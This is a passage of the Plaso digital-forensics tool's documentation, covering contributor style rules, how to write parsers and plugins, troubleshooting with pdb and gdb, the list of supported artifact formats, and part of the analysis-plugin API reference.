https://github.com/open-source-dfir/slack


Core features changes

Sometimes you need to make some change to the core of the Plaso codebase. In those cases we ask that contributorsfirst create a short design proposal explaining the rationale behind the change. The design doc needs to contain:

1. A description of the problem you are facing

2. A list of the objectives of the change

3. A discussion of what’s in scope and what’s not

4. A descripton of your proposed the solution

The preferred way of creating these design docs is to use Google Docs and send the link to the development mailinglist so that it can be discussed further before starting to implement the code.

The current design docs are stored here. You may not have access to that folder, so you may need to request access toit.

Tests

Tests are part of a maintainable code base. Code without sufficient test is very likely to be broken by a largerewrite/refactor.

Plaso has specific guidelines for writing tests: Style guide - tests

2.2 Style Guide

Plaso follows the log2timeline style guide.

2.2.1 Plaso specific style points

Event data attribute containers

Data types

Every event data attribute container defines a data type (DATA_TYPE).

Conventions for the data type names are:

1. If the data type is operating system (or operating system convension such as POSIX) specific start with the nameof operating system or convention. Currently supported prefixes:

• android

• chromeos

• ios

• linux

• macos

• windows

Otherwise skip the operating system prefix.

1. Next is the name of the application, sub system or data format for example ‘chrome’, ‘windows:registry’ or‘windows:evtx’.

2.2. Style Guide 17

https://drive.google.com/folderview?id=0B3fBvzttpiiSQW16cFhNTUtXVGM&usp=sharing

Style-guide.html#tests

https://github.com/log2timeline/l2tdocs/blob/master/process/Style-guide.md


TODO: describe which one is preferred and why.

1. What follows are application, sub system or data format specific type information for example ‘win-dows:evtx:record’.

Value types

Values stored in an event data attribute container must be of certain types otherwise event filtering or output formattingcan break. Supported Python types are:

• bool (also see note below)

• int

• str

A list, of the types previously mentioned types, are supported. Do not use dict or binary strings.

Use a bool sparsely. For now it is preferred to preserve the original type. For example if -1 represents False and 0True, store the value as an integer not as a bool. The message formatter can represent the numeric value as a humanreadable string.

Tests

• Use the test functions available in the local test_lib.py as much as possible nstead of writing your own testfunctions. If you think a test function is missing please add it, or mail the developer list to see if you can getsomeone else to do it.

• Use self.CheckTimestamp for testing timestamp values.

Common test code should be stored in “test library” files, for example. the parser test library is tests/parsers/test_lib.py.

We do this for a few reasons:

• to remove code duplication in “boiler plate” test code;

• to make the tests more uniform in both look-and-feel but also what is tested;

• improve test coverage;

• isolate core functionality from tests to prevent some future core changes affecting the parsers and plugins toomuch.

2.3 How to write a parser

2.3.1 Introduction

This page is intended to give you an introduction into developing a parser for Plaso.

• First a step-by-step example is provided to create a simple binary parser for the Safari Cookies.binarycookiesfile.

• At bottom are some common troubleshooting tips that others have run into before you.

This page assumes you have at least a basic understanding of programming in Python and use of git.



2.3.2 Format

Before you can write a binary file parser you will need to have a good understanding of the file format. A descriptionof the Safari Cookies.binarycookies format can be found here.

2.3.3 Parsers vs. Plugins

Before starting work on a parser, check if Plaso already has a parser that handles the underlying format of the fileyou’re parsing. Plaso currently supports plugins for the following file formats:

• Bencode

• Compound zip files

• Web Browser Cookies

• ESEDB

• OLECF

• Plist

• SQLite

• Syslog

• Windows Registry

If the artifact you’re trying to parse is in one of these formats, you need to write a plugin of the appropriate type, ratherthan a parser.

For our example, however, the Safari Cookies.binarycookies file is in its own binary format, so a separate parser isappropriate.

2.3.4 Test data

First we make a representative test file and add it to the test_data/ directory, in our example:

test_data/Cookies.binarycookies

Make sure that the test file does not contain sensitive or copyrighted material.

2.3.5 Parsers, formatters, events and event data

• parser; a subclass of FileObjectParser that extracts events from the content of a file.

• formatter (or event formatter); a subclass of EventFormatter which generates a human readable description ofthe event data.

• event; a subclass of EventObject which represents an event

• event data; a subclass of EventData which represents data related to the event.

2.3. How to write a parser 19

https://github.com/libyal/dtformats/blob/master/documentation/Safari%20Cookies.asciidoc

../api/plaso.parsers.html#plaso.parsers.interface.FileObjectParser

../api/plaso.formatters.html#plaso.formatters.interface.EventFormatter

../api/plaso.containers.html#plaso.containers.events.EventObject

Scribbles-about-events.md#what-is-an-event

../api/plaso.containers.html#plaso.containers.events.EventData


Writing the parser

Registering the parser

Add an import for the parser to:

plaso/parsers/__init__.py

It should look like this:

from plaso.parsers import safari_cookies

When plaso.parsers is imported this will load the safari_cookies module safari_cookies.py.

The parser class BinaryCookieParser is registered using manager.ParsersManager.RegisterParser(BinaryCookieParser).

plaso/parsers/safari_cookies.py

# -*- coding: utf-8 -*-"""Parser for Safari Binary Cookie files."""

from plaso.parsers import interfacefrom plaso.parsers import manager

class BinaryCookieParser(interface.FileObjectParser):"""Parser for Safari Binary Cookie files."""

NAME = 'binary_cookies'DATA_FORMAT = 'Safari Binary Cookie file'

def ParseFileObject(self, parser_mediator, file_object, **kwargs):"""Parses a Safari binary cookie file-like object.

Args:parser_mediator (ParserMediator): parser mediator.file_object (dfvfs.FileIO): file-like object to be parsed.

Raises:UnableToParseFile: when the file cannot be parsed, this will signal

the event extractor to apply other parsers."""...

manager.ParsersManager.RegisterParser(BinaryCookieParser)



Writing the message formatter

The event message format is defined in data/formatters/*.yaml.

For more information about the configuration file format see: message formatting

2.4 How to write a parser plugin

Writing a parser plugin is different depending on which parser you’re writing a plugin for. Parsers that support pluginsare:

• bencode

• cookie

• czip (Compound zip files)

• esedb

• olecf

• plist

• sqlite

• syslog

• winreg

2.5 How to write an analysis plugin

2.5.1 Create file and class

• Plugin file in plaso/analysis/

– Create an empty subclass of AnalysisPlugin

– Register it with the analysis plugin by calling AnalysisPluginManager.RegisterPlugin

• Test file in tests/analysis/

– Create an empty subclass of tests.analysis.test_lib.AnalysisPluginTestCase

2.5.2 Write minimal tests

• Write a test that loads your plugin

• It will fail initially, but running the test while you’re developing your plugin gives you a quick way to see if yourcode is doing what you expect.

2.4. How to write a parser plugin 21

../user/Output-and-formatting.html#message-formatting

../api/plaso.analysis.html#plaso.analysis.interface.AnalysisPlugin

../api/plaso.analysis.html#plaso.analysis.manager.AnalysisPluginManager.RegisterPlugin


2.5.3 Develop plugin

• Implement your subclass of AnalysisPlugin

• You’ll need to define/override:

– NAME

– ExamineEvent()

– CompileReport()

• You may also want to override:

– URLS

– ENABLE_IN_EXTRACTION, if your plugin is eligible to run while Plaso is extracting events.

2.5.4 Expand tests

• Add additional tests that test your plugin

2.5.5 Register classes

• Edit plaso/analysis/__init__.py to import your plugin in the correct alphabetical order.

2.5.6 Code review/submit

2.6 How to write an output module

2.6.1 Create file and class

• Plugin file in plaso/output/

– Create an empty subclass of plaso.output.interface.OutputModule

– Register it with the output module manager by calling OutputManager.RegisterOutput

• Test file in tests/output/

– Create an empty subclass of tests.output.test_lib.OutputModuleTestCase

2.6.2 Write minimal tests

• Write a test that loads your output module.

• It will fail initially, but running the test while you’re developing your plugin gives you a quick way to see if yourcode is doing what you expect.


../api/plaso.analysis.html#plaso.analysis.interface.AnalysisPlugin

../api/plaso.output.html#plaso.output.interface.OutputModule

../api/plaso.output.html#plaso.output.manager.OutputManager.RegisterOutput


2.6.3 Develop plugin

• Implement your subclass of plaso.output.interface.OutputModule

• You’ll need to define/overwrite:

– NAME

– DESCRIPTION

– WriteEventBody

• You may also want to override:

– Open()

– Close()

– GetMissingArguments()

– WriteHeader()

– WriteEventMACBGroup()

– WriteFooter()

2.6.4 Expand tests

• Add additional tests that test your plugin

2.6.5 Register classes

• Edit plaso/output/__init__.py to import your plugin in the correct alphabetical order.

2.6.6 Code review/submit

• Create a PR to have the changes reviewed and merged with the master branch.

2.6. How to write an output module 23

../api/plaso.output.html#plaso.output.interface.OutputModule



CHAPTER

THREE

TROUBLESHOOTING

This page contains instructions that can be used to assist you in debugging potential issues with Plaso and its depen-dencies.

3.1 Quick list

1. Check the commit history and issue tracker if the bug has already been fixed;

2. If you are running the development release make sure Plaso and dependencies are up to date, see: DevelopersGuide

3. If you are experiencing an issue that cannot directly be attributed to some broken code e.g. the test are gettingkilled, check your system logs it might be a problem with resources available to Plaso;

4. Try to isolate the error, see below.

If everything fails create a new issue on the issue tracker. Please provide as much detailed information as possible,keep in mind that:

• we cannot fix errors based on vague descriptions;

• we cannot look into your thoughts or on your systems;

• we cannot easily isolate errors if you keep changing your test environment.

Hence please provide us with the following details:

• What steps will reproduce the problem?

– What output did you expect?

– What do you see instead?

• The output of log2timeline.py --troubles, which provide:

– The Python version including operating system and architecture

– The path to plaso/log2timeline

– The version of plaso/log2timeline

– Information about dependencies

• Are you processing a storage media image, if so which format, a directory or on an individual file?

• Were you able to isolate the error to a specific file? Is it possible to share the file with the developer?

• Any additional information that could be of use e.g. build logs, error logs, debug logs, etc.

25

https://github.com/log2timeline/plaso/commits/master

https://github.com/log2timeline/plaso/issues?q=is%3Aissue



Note that the github issue tracker uses markdown and thus please escape blocks of error output accordingly.

Also see the sections below on how to troubleshoot issues of a specific nature.

3.1.1 Performance related issues

• On what type of media is your source data stored? What type of media are you writing to?

– A local disk, a removable disk or network storage?

– Both removable media and network storage can add additional latency to reads and writes making overallprocessing slow. It is recommended to at least write to local low-latency media.

• Are you seeing workers being killed?

– Respawning of workers creates more overhead and slower processing times.

– Workers being killed typically indicates one of the parser misbehaving. If the worker is consuming a highamount of memory, also see section “High memory usage” below.

• Are you running Plaso in a VM or Docker container?

3.2 Isolating errors

The most important part of troubleshooting is isolating the error.

Can you run the tests successfully?

$ python run_tests.py...----------------------------------------------------------------------Ran 585 tests in 66.530s

OK

If an error occurs when processing a storage media image try to run with the storage image media file and/or thefile system directly mounted. Mounting the storage image media file will bypass libraries (modules) supporting thestorage image media format. Running source_analyzer.py can help pinpointing the issue, e.g.

PYTHONPATH=. python examples/source_analyzer.py --no-auto-recurse

Try:

• logging to a log file log2timeline.py --log-file=log2timeline.log ...;

• running in debug mode log2timeline.py --debug ...;

• running in single process mode this will bypass any issues with multi processing log2timeline.py--single-process ...;

• mounting the file system as well to bypass libraries (modules) supporting the file system, e.g. the SleuthKit andpytsk;

• running in single process and debug mode, see section below.

26 Chapter 3. Troubleshooting

https://help.github.com/articles/markdown-basics/

https://github.com/log2timeline/dfvfs/blob/master/examples/source_analyzer.py


3.3 Producing debug logs

To produce debugging logs, run log2timeline like so: log2timeline.py--log-file=log2timeline_problem.log.gz --debug. This will create multiple, gzip-compressed logfiles. There will be one called log2timeline_problem.log.gz containing logs from the main log2timeline process, andone log file for each worker process.

Note that the .gz file suffix is important, as it triggers Plaso to compress the log output. In an uncompressed form, thelogs are very large. The compressed logs can be reviewed with unzip tools like zless and zgrep.

3.4 Import errors

It sometimes happen that the tests fail with an import error e.g.

ImportError: Failed to import test module:plaso.parsers.winreg_plugins.shutdown_testTraceback (most recent call last):

File "/usr/lib64/python3.7/unittest/loader.py", line 254, in _find_testsmodule = self._get_module_from_name(name)

File "/usr/lib64/python3.7/unittest/loader.py", line 232, in_get_module_from_name

__import__(name)File "./plaso/parsers/__init__.py", line 4, in <module>from plaso.parsers import asl

ImportError: cannot import name asl

This does not necessarily mean that the code cannot find the asl module. The import error can mask an underlyingissue. Try running the following commands in a Python shell:

$ pythonimport syssys.path.insert(0, u'.')import plaso

It also sometimes means that you have multiple versions of Plaso installed on your system and Python tries to importfor the wrong one.

3.5 Crashes, hangs and tracebacks

In the context of Plaso crashes and tracebacks have different meanings:

• crash; an error that causes an abrupt termination of the program you were running e.g. a segfault (SIGSEGV)

• traceback; the back trace of an error that was caught by an exception handler that can cause a termination of theprogram you were running

3.3. Producing debug logs 27


3.5.1 A worker segfault-ing

Since Plaso relies on several compiled dependencies it is possible that a worker segfault (SIGSEGV).

As part of the 1.3 pre-release bug hunting a SIGSEGV signal handler was added however this process turned out, asexpected, unreliable. However it added an interesting side effect that is very useful for debugging. If the SIGSEGVsignal handler is enable the worker process typically remains in the “running” state but stops producing event object.What happens under the hood is that the SIGSEGV signal is caught but the worker is unable to cleanly terminate.Because of this “frozen” state of the worker it is very easy to attach a debugger e.g. gdb python -p PID.

A kill -11 PID however seems to be cleanly handled by the SIGSEGV signal handler and puts the worker into“error” status.

3.5.2 A worker gives a killed status

This typically indicates that the worker was killed (SIGKILL) likely by an external process e.g the Out Of Memory(OOM) killer.

Your system logs might indicate why the worker was killed.

3.5.3 Which processes are running

The following command help you determine which Plaso processes are running on your system:

Linux:

top -p `ps -ef | grep log2timeline.py | grep python | awk '{ print $2 }' | tr '\n' ',→˓' | sed 's/,$//'`

MacOS:

ps aux | grep log2timeline.py | grep python | awk '{print $2}' | tr '\n' ',' | sed 's/→˓,$//'

3.5.4 Analyzing crashes with single process and debug mode

In single process and debug mode log2timeline.py --debug --single-process ... log2timeline willrun a Python debug shell (pdb) when an uncaught Python exception is raised.

Use:

• w to print the frames.

• u to go up one frame or d to go down one frame.

• l to print source code of the current frame.

Note that typically the top-level (oldest) frame will contain the exception:

p exception

Note that inside pdb you can run any Python commands including loading new libraries e.g. for troubleshooting.You can prepend commands with an exclamation mark (!) to indicate that you want to run a Python command as anopposed to a debug shell one.

To print the attributes of the current object you are looking for.



!self.__dict__

To print the current argument stack to see what arguments are available to you.

args

3.5.5 Analyzing crashes with gdb

Once you have isolated the file that causes the crash and you cannot share the file you can generate a back trace thatcan help us fix the error.

First make sure you have the debug symbols installed.

Then run Plaso as a single process with gdb:

gdb --ex r --args log2timeline.py --single-process -d /tmp/test.dump /tmp/file_that_→˓crashes_the_tool

To generate a back trace:

bt

Note that often the first 10 lines of the back trace are sufficient information.

An alternative approach is to attach a debugger to it once the program is running:

gdb python -p PID

Where PID is the process identifier of the program. Once the debugger is attached continue running:

c

Wait until the crash occurs and generate a back trace.

Also see: DebuggingWithGdb, gdb Support

3.6 High memory usage

Plaso consists of various components. It can happen that one of these components uses a lot of memory or even leaksmemory. In these cases it is important to isolate the error, see before, to track down what the possible culprit is. Alsosee: Profiling memory usage

Also see Troubleshooting Plaso Issues - Memory Edition

3.7 MacOS specific issues

3.7.1 How do I remove a Plaso installation

If you installed Plaso via the installer script in the .dmg, the MacOS package manager can be used to remove a Plasoinstallation. For more information about using the MacOS package manager see:

• http://superuser.com/questions/36567/how-do-i-uninstall-any-apple-pkg-package-file

3.6. High memory usage 29

https://wiki.python.org/moin/DebuggingWithGdb

https://docs.python.org/devguide/gdb.html

developer/Profiling.md#profiling-memory-usage

http://blog.kiddaland.net/2014/11/troubleshooting-plaso-issues-memory.html


3.7.2 PyParsing errors

MacOS bundles its own version of PyParsing that is older than the version required by Plaso. Fix this by using thespecial wrapper scripts (log2timeline**.sh**, et. al.), or if you don’t want to do that, manipulate PYTHONPATH sothat the newer version is loaded. This is detailed on the MacOS development page.

3.7.3 ImportError: cannot import name dependencies

There can be numerous reasons for imports to fail on MacOS here we describe some of the more common onesencountered:

• clashing versions; you have multiple clashing versions installed on your system check the Python site-packages paths such as: /Library/Python/2.7/site-packages/, /usr/local/lib/python2.7/site-packages/.

• you used pip without virtualenv and have messed up your site-packages

3.7.4 You used pip without virtualenv and have messed up your site-packages

The use of pip without virtualenv on MacOS is strongly discouraged, unless you are very familiar with thesetools. You might have already messed up your site-packages beyond a state of a timely repair.

3.8 Ubuntu Linux specific issues

3.8.1 Origin of an installed package

To determine the origin of an installed package

apt-cache showpkg <package name>

3.9 Windows specific issues

3.9.1 Not a valid Win32 application

When I load one of the Python modules I get:

ImportError: DLL load failed: %1 is not a valid Win32 application.

This means your Python interpreter (on Windows) cannot load a Python module since the module is not a valid Win32DLL file. One cause of this could be mismatch between a 64-bit Python and 32-bit build module (or vice versa).



3.9.2 Unable to find an entry point in DLL

When I try to import one of the Python-bindings I get:

ImportError: DLL load failed: The specified procedure could not be found.

Make sure the DLL is built for the right WINAPI version, check the value of WINVER of your build.

3.9.3 setup.py and build errors

Unable to find vcvarsall.bat

When running setup.py I get:

error: Unable to find vcvarsall.bat

Make sure the environment variable VS90COMNTOOLS is set, e.g. for Visual Studio 2010:

set VS90COMNTOOLS=%VS100COMNTOOLS%

Or set it to a path:

set VS90COMNTOOLS="C:\Program Files (x86)\Microsoft Visual Studio 10.0\Common7\Tools\"

ValueError: [u’path’] when running setup.py

When running setup.py I get:

ValueError: [u'path']

Try running the command from the “Windows SDK 7.1” or “Visual Studio” Command Prompt.

I’m getting linker “unresolved externals” errors when running setup.py

If you’re building a 64-bit version of a Python binding Visual Studio 2010 express make sure to use “Windows SDK7.1 Command Prompt”.

3.9. Windows specific issues 31



CHAPTER

FOUR

SUPPORTED FORMATS

The information below is based of version 1.5.0

4.1 Storage Media Image File Formats

Storage Media Image File Format support is provided by dfvfs.

4.2 Volume System Formats

Volume System Format support is provided by dfvfs.

4.3 File System Formats

File System Format support is provided by dfvfs.

4.4 File formats

• Apple System Log (ASL)

• Android usage-history (app usage)

• Basic Security Module (BSM)

• Bencode files

• Chrome Disk Cache Format

• Chrome preferences

• CUPS IPP

• Extensible Storage Engine (ESE) Database File (EDB) format using libesedb

• Firefox Cache

• Java WebStart IDX

• Jump Lists .customDestinations-ms files

• MacOS Application firewall

33

https://github.com/log2timeline/dfvfs/wiki#storage-media-types

https://github.com/log2timeline/dfvfs/wiki#volume-systems

https://github.com/log2timeline/dfvfs/wiki#file-systems

https://forensicswiki.xyz/wiki/index.php?title=Basic_Security_Module_(BSM)_file_format

https://forensicswiki.xyz/wiki/index.php?title=Chrome_Disk_Cache_Format

https://forensicswiki.xyz/wiki/index.php?title=Extensible_Storage_Engine_(ESE)_Database_File_(EDB)_format

https://github.com/libyal/libesedb

https://forensicswiki.xyz/wiki/index.php?title=Java

https://forensicswiki.xyz/wiki/index.php?title=Jump_Lists


• MacOS Keychain

• MacOS Securityd

• MacOS Wifi

• mactime logs

• McAfee Anti-Virus Logs

• Microsoft Internet Explorer History File Format (also known as MSIE 4 - 9 Cache Files or index.dat) usinglibmsiecf

• Microsoft IIS log files

• NTFS $MFT and $UsnJrnl:$J using libfsntfs

• OLE Compound File using libolecf

• Opera Browser history

• OpenXML

• Pcap files

• Portable Executable (PE) files using pefile

• PL SQL cache file (PL-SQL developer recall files)

• Popularity Contest log

• Property list (plist) format using plistlib

• Restore Point logs (rp.log)

• Safari Binary Cookies

• SCCM client logs

• SELinux audit logs

• SkyDrive log and error log files

• SQLite database format using SQLite

• Symantec AV Corporate Edition and Endpoint Protection log

• Syslog

• utmp, utmpx

• Windows Event Log (EVT) using libevt

• Windows Firewall

• Windows Job files (also known as “at jobs”)

• Windows Prefetch files

• Windows Recycle bin (INFO2 and $I/$R)

• Windows NT Registry File (REGF) using libregf

• Windows Shortcut File (LNK) format using liblnk (including shell item support)

• Windows XML Event Log (EVTX) using libevtx

• Xchat and Xchat scrollback files

• Zsh history files

34 Chapter 4. Supported Formats

https://github.com/libyal/dtformats/blob/master/documentation/MacOS%20keychain%20database%20file%20format.asciidoc

https://forensicswiki.xyz/wiki/index.php?title=Mactime

https://forensicswiki.xyz/wiki/index.php?title=Internet_Explorer_History_File_Format

https://github.com/libyal/libmsiecf

https://github.com/libyal/libfsntfs

https://forensicswiki.xyz/wiki/index.php?title=OLE_Compound_File

https://github.com/libyal/libolecf

https://forensicswiki.xyz/wiki/index.php?title=Opera

https://github.com/erocarrera/pefile

https://forensicswiki.xyz/wiki/index.php?title=Property_list_(plist)

https://github.com/libyal/dtformats/blob/master/documentation/Restore%20point%20formats.asciidoc

https://github.com/libyal/dtformats/blob/master/documentation/Safari%20Cookies.asciidoc

https://forensicswiki.xyz/wiki/index.php?title=SQLite_database_format

https://forensicswiki.xyz/wiki/index.php?title=SQLite

https://github.com/libyal/dtformats/blob/master/documentation/Utmp%20login%20records%20format.asciidoc

https://forensicswiki.xyz/wiki/index.php?title=Windows_Event_Log_(EVT)

https://github.com/libyal/libevt

https://forensicswiki.xyz/wiki/index.php?title=Windows_Job_File_Format

https://forensicswiki.xyz/wiki/index.php?title=Windows_Prefetch_File_Format

https://forensicswiki.xyz/wiki/index.php?title=Windows#Recycle_Bin

https://forensicswiki.xyz/wiki/index.php?title=Windows_NT_Registry_File_(REGF)

https://github.com/libyal/libregf

https://forensicswiki.xyz/wiki/index.php?title=LNK

https://github.com/libyal/liblnk

https://forensicswiki.xyz/wiki/index.php?title=Windows_XML_Event_Log_(EVTX)

https://github.com/libyal/libevtx


4.5 Bencode file formats

• Transmission

• uTorrent

4.6 ESE database file formats

• Internet Explorer WebCache format

• Windows 8 File History

4.7 OLE Compound File formats

• Document summary information

• Summary information (top-level only)

• Jump Lists .automaticDestinations-ms files

4.8 Property list (plist) formats

• Airport

• Apple Account

• Bluetooth

• Install History

• iPod/iPhone

• Mac User

• Safari history

• Software Update

• Spotlight

• Spotlight Volume Information

• Timemachine

4.9 SQLite database file formats

• Android call logs

• Android SMS

• Chrome cookies

• Chrome browsing and downloads history

• Chrome Extension activity

4.5. Bencode file formats 35

https://forensicswiki.xyz/wiki/index.php?title=Jump_Lists

https://forensicswiki.xyz/wiki/index.php?title=Apple_Safari


• Firefox cookies

• Firefox browsing and downloads history

• Google Drive

• iMessage (iOS and MacOS)

• Kik (iOS)

• Launch services quarantine events

• MacKeeper cache

• MacOS document versions

• Skype text conversations

• Twitter (iOS)

• Zeitgeist activity database

4.10 Windows Registry formats

• AppCompatCache

• BagMRU (or ShellBags)

• CCleaner

• Explorer ProgramsCache

• Less Frequently Used (LFU)

• MountPoints2

• Most Recently Used (MRU) MRUList and MRUListEx (including shell item support)

• MSIE Zones

• Office MRU

• Outlook Search

• Run and RunOnce keys

• SAM

• Services

• Shutdown

• Task Scheduler Cache (Task Cache)

• Terminal Server MRU

• Timezones

• Typed URLS

• USB

• USBStor

• UserAssist

• WinRar


https://github.com/libyal/winreg-kb/blob/master/documentation/Programs%20Cache%20values.asciidoc


• Windows version information

4.11 Hashers Supported

• MD5

• SHA1

• SHA256

4.11. Hashers Supported 37



CHAPTER

FIVE

PLASO PACKAGE

5.1 Subpackages

5.1.1 plaso.analysis package

Submodules

plaso.analysis.browser_search module

A plugin that extracts browser history from events.

class plaso.analysis.browser_search.BrowserSearchPluginBases: plaso.analysis.interface.AnalysisPlugin

Analyze browser search entries from events.

CompileReport(mediator)Compiles an analysis report.

Parameters mediator (AnalysisMediator) – mediates interactions between analysisplugins and other components, such as storage and dfvfs.

Returns analysis report.

Return type AnalysisReport

ENABLE_IN_EXTRACTION = False

ExamineEvent(mediator, event, event_data, event_data_stream)Analyzes an event.

Parameters

• mediator (AnalysisMediator) – mediates interactions between analysis pluginsand other components, such as storage and dfvfs.

• event (EventObject) – event.

• event_data (EventData) – event data.

• event_data_stream (EventDataStream) – event data stream.

NAME = 'browser_search'

class plaso.analysis.browser_search.SEARCH_OBJECT(time, source, engine, search_term)Bases: tuple

property engineAlias for field number 2

39


property search_termAlias for field number 3

property sourceAlias for field number 1

property timeAlias for field number 0

plaso.analysis.chrome_extension module

A plugin that gather extension IDs from Chrome history browser.

class plaso.analysis.chrome_extension.ChromeExtensionPluginBases: plaso.analysis.interface.AnalysisPlugin

Convert Chrome extension IDs into names, requires Internet connection.





ENABLE_IN_EXTRACTION = True

ExamineEvent(mediator, event, event_data, event_data_stream)Analyzes an event.

Parameters


• event (EventObject) – event to examine.



NAME = 'chrome_extension'

plaso.analysis.definitions module

This file contains the definitions for analysis plugins.

40 Chapter 5. plaso package


plaso.analysis.file_hashes module

A plugin to generate a list of unique hashes and paths.

class plaso.analysis.file_hashes.FileHashesPluginBases: plaso.analysis.interface.AnalysisPlugin

A plugin for generating a list of file paths and corresponding hashes.



Returns report.



ExamineEvent(mediator, event, event_data, event_data_stream)Analyzes an event and creates extracts hashes as required.

Parameters





NAME = 'file_hashes'

plaso.analysis.hash_tagging module

This file contains the interface for analysis plugins.

class plaso.analysis.hash_tagging.HTTPHashAnalyzer(hash_queue,hash_analysis_queue,hashes_per_batch=1,lookup_hash='sha256',wait_after_analysis=0)

Bases: plaso.analysis.hash_tagging.HashAnalyzer

Interface for hash analysis plugins that use HTTP(S)

abstract Analyze(hashes)Analyzes a list of hashes.

Parameters hashes (list[str]) – hashes to look up.

Returns analysis results.

Return type list[HashAnalysis]

MakeRequestAndDecodeJSON(url, method, **kwargs)Make a HTTP request and decode the results as JSON.

Parameters

• url (str) – URL to make a request to.

5.1. Subpackages 41


• method (str) – HTTP method to used to make the request. GET and POST are sup-ported.

• kwargs – parameters to the requests .get() or post() methods, depending on the value ofthe method parameter.

Returns body of the HTTP response, decoded from JSON.

Return type dict[str, object]

Raises

• ConnectionError – If it is not possible to connect to the given URL, or it the requestreturns a HTTP error.

• ValueError – If an invalid HTTP method is specified.

class plaso.analysis.hash_tagging.HashAnalysis(subject_hash, hash_information)Bases: object

Analysis information about a hash.

hash_informationobject containing information about the hash.

Type object

subject_hashhash that was analyzed.

Type str

class plaso.analysis.hash_tagging.HashAnalyzer(hash_queue, hash_analysis_queue,hashes_per_batch=1,lookup_hash='sha256',wait_after_analysis=0)

Bases: threading.Thread

Class that defines the interfaces for hash analyzer threads.

This interface should be implemented once for each hash analysis plugin.

analyses_performednumber of analysis batches completed by this analyzer.

Type int

hashes_per_batchmaximum number of hashes to analyze at once.

Type int

lookup_hashname of the hash attribute to look up.

Type str

seconds_spent_analyzingnumber of seconds this analyzer has spent performing analysis (as opposed to waiting on queues, etc.)

Type int

wait_after_analysisnumber of seconds the analyzer will sleep for after analyzing a batch of hashes.

Type int



abstract Analyze(hashes)Analyzes a list of hashes.

Parameters hashes (list[str]) – list of hashes to look up.

Returns list of results of analyzing the hashes.


EMPTY_QUEUE_WAIT_TIME = 4

SUPPORTED_HASHES = []

SetLookupHash(lookup_hash)Sets the hash to query.

Parameters lookup_hash (str) – name of the hash attribute to look up.

Raises ValueError – if the lookup hash is not supported.

SignalAbort()Instructs this analyzer to stop running.

run()The method called by the threading library to start the thread.

class plaso.analysis.hash_tagging.HashTaggingAnalysisPlugin(analyzer_class)Bases: plaso.analysis.interface.AnalysisPlugin

An interface for plugins that tag events based on the source file hash.

An implementation of this class should be paired with an implementation of the HashAnalyzer interface.

hash_analysis_queuequeue that contains the results of analysis of file hashes.

Type queue.Queue

hash_queuequeue that contains file hashes.

Type queue.Queue



Returns report.


DATA_TYPES = []

DEFAULT_QUEUE_TIMEOUT = 4

EstimateTimeRemaining()Estimates how long until all hashes have been analyzed.

Returns estimated number of seconds until all hashes have been analyzed.

Return type int

ExamineEvent(mediator, event, event_data, event_data_stream)Evaluates whether an event contains the right data for a hash lookup.

Parameters

5.1. Subpackages 43






abstract GenerateLabels(hash_information)Generates a list of strings to tag events with.

Parameters hash_information (object) – object that mediates the result of the analysisof a hash, as returned by the Analyze() method of the analyzer class associated with thisplugin.

Returns list of labels to apply to events.

Return type list[str]

SECONDS_BETWEEN_STATUS_LOG_MESSAGES = 30

SetLookupHash(lookup_hash)Sets the hash to query.

Parameters lookup_hash (str) – name of the hash attribute to look up.

plaso.analysis.interface module

This file contains the interface for analysis plugins.

class plaso.analysis.interface.AnalysisPluginBases: object

Class that defines the analysis plugin interface.

abstract CompileReport(mediator)Compiles a report of the analysis.

After the plugin has received every copy of an event to analyze this function will be called so that thereport can be assembled.


Returns report.



abstract ExamineEvent(mediator, event, event_data, event_data_stream)Analyzes an event.

Parameters





NAME = 'analysis_plugin'



URLS = []

property plugin_namename of the plugin.

Type str

plaso.analysis.logger module

The analysis sub module logger.

plaso.analysis.manager module

This file contains the analysis plugin manager class.

class plaso.analysis.manager.AnalysisPluginManagerBases: object

Analysis plugin manager.

classmethod DeregisterPlugin(plugin_class)Deregisters an analysis plugin class.

The analysis plugin classes are identified by their lower case name.

Parameters plugin_class (type) – class of the analysis plugin.

Raises KeyError – if an analysis plugin class is not set for the corresponding name.

classmethod GetAllPluginInformation(show_all=True)Retrieves a list of the registered analysis plugins.

Parameters show_all (Optional[bool]) – True if all analysis plugin names should belisted.

Returns

the name, docstring and type string of each analysis plugin in alphabetical order.

Return type list[tuple[str, str, str]]

classmethod GetPluginNames()Retrieves the analysis plugin names.

Returns analysis plugin names.


classmethod GetPluginObjects(plugin_names)Retrieves the plugin objects.

Parameters plugin_names (list[str]) – names of plugins that should be retrieved.

Returns analysis plugins per name.

Return type dict[str, AnalysisPlugin]

classmethod GetPlugins()Retrieves the registered analysis plugin classes.

Yields tuple –

containing:

str: name of the plugin type: plugin class

5.1. Subpackages 45


classmethod RegisterPlugin(plugin_class)Registers an analysis plugin class.

Then analysis plugin classes are identified based on their lower case name.

Parameters plugin_class (type) – class of the analysis plugin.

Raises KeyError – if an analysis plugin class is already set for the corresponding name.

classmethod RegisterPlugins(plugin_classes)Registers analysis plugin classes.

The analysis plugin classes are identified based on their lower case name.

Parameters plugin_classes (list[type]) – classes of the analysis plugin.

Raises KeyError – if an analysis plugin class is already set for the corresponding name.

plaso.analysis.mediator module

The analysis plugin mediator object.

class plaso.analysis.mediator.AnalysisMediator(storage_writer, knowledge_base,data_location=None)

Bases: object

Analysis plugin mediator.

last_activity_timestamptimestamp received that indicates the last time activity was observed. The last activity timestamp is updatedwhen the mediator produces an attribute container, such as an event tag. This timestamp is used by the multiprocessing worker process to indicate the last time the worker was known to be active. This information isthen used by the foreman to detect workers that are not responding (stalled).

Type int

number_of_produced_analysis_reportsnumber of produced analysis reports.

Type int

number_of_produced_event_tagsnumber of produced event tags.

Type int

GetDisplayNameForPathSpec(path_spec)Retrieves the display name for a path specification.

Parameters path_spec (dfvfs.PathSpec) – path specification.

Returns human readable version of the path specification.

Return type str

GetUsernameForPath(path)Retrieves a username for a specific path.

This is determining if a specific path is within a user’s directory and returning the username of the user ifso.

Parameters path (str) – path.

Returns



username or None if the path does not appear to be within a user’s directory.

Return type str

ProduceAnalysisReport(plugin)Produces an analysis report.

Parameters plugin (AnalysisPlugin) – plugin.

ProduceEventTag(event_tag)Produces an event tag.

Parameters event_tag (EventTag) – event tag.

SignalAbort()Signals the analysis plugins to abort.

property abortTrue if the analysis should be aborted.

Type bool

property data_locationpath to the data files.

Type str

property operating_systemoperating system or None if not set.

Type str

plaso.analysis.nsrlsvr module

Analysis plugin to look up files in nsrlsvr and tag events.

